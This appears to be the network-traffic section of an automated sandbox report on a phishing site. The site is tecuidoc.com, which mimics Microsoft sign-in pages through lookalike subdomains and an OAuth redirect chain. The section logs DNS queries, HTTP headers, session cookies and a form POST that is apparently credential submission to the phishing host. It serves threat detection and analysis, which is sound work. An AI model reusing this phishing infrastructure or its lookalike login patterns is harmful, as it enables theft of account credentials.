          Source: global trafficHTTP traffic detected: GET /datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /watson_DOaS_v-h3FCKtNPQv8zSLw2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: /dtL2oJ7s2rDgfnvkQ6REw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /images/favicon.ico?v=2 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1Host: signup.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /Resources/images/favicon.ico HTTP/1.1Host: signup.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1Host: signup.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /images/favicon.ico?v=2 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1Host: signup.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
          Source: global trafficHTTP traffic detected: GET /Resources/images/favicon.ico HTTP/1.1Host: signup.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
          Source: global trafficHTTP traffic detected: GET /Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1Host: signup.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
          Source: global trafficDNS traffic detected: DNS query: srmcorp.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: eccd3fea-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: 7457d826-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: 7e55e394-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: l1ve.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: 0a413710-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: signup.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: bd6a002d-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: a0d99ec0-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: a4a4d19d-7d4f53f3.tecuidoc.com
          Source: global trafficDNS traffic detected: DNS query: 30e9fbb5-7d4f53f3.tecuidoc.com
          Source: unknownHTTP traffic detected: POST /?PSZlk=ViP HTTP/1.1Host: srmcorp.tecuidoc.comConnection: keep-aliveContent-Length: 4364Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://srmcorp.tecuidoc.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://srmcorp.tecuidoc.com/?PSZlk=ViPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:56:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: bd52b8c9-42c0-40ae-8ab7-34ad062ecf00x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:56:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: d7eec534-07d9-4c19-9944-2c440518d000x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:56:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: bd031e1d-9d1e-41fb-9edf-a29853d20c01x-ms-ests-server: 2.1.17846.6 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:56:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: no-store, no-cachex-ua-compatible: IE=Edgex-cache: CONFIG_NOCACHEx-msedge-ref: Ref A: BBB2A2C56ED740F186DFDB0138F0E4E0 Ref B: DFW311000106025 Ref C: 2024-04-26T14:56:46Zaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:56:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: aa5ce125-d4f6-4944-8a79-fc1226473301x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:57:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 07c1adb9-604a-40df-8adf-35ce33ea1601x-ms-ests-server: 2.1.17846.6 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:57:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b592d541-e005-4274-b051-009b91ccf800x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:57:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 9fdfc594-68fa-430e-ab3d-e2c2f7041c01x-ms-ests-server: 2.1.17846.6 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:57:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 7e2afcc5-d2f0-4ddb-9831-e2e534935d01x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 14:57:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: a74a6ae5-db85-4370-b75f-8692965b4801x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
